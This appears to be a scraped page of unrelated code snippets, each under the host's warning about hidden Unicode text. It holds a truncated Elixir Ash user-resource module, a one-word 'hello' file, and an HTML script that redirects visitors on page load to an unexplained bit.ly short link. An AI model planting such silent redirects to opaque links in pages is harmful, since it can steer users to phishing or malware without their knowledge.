This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
defmodule Steward.Accounts.User do | |
@moduledoc """ | |
User resource for account management. | |
Represents users of the system with authentication capabilities. | |
""" | |
use Ash.Resource, | |
otp_app: :steward, | |
domain: Steward.Accounts, | |
data_layer: AshPostgres.DataLayer, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
window.onload = function () { | |
window.location = "bit.ly/3BAJBdV" | |
} | |
</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
hello |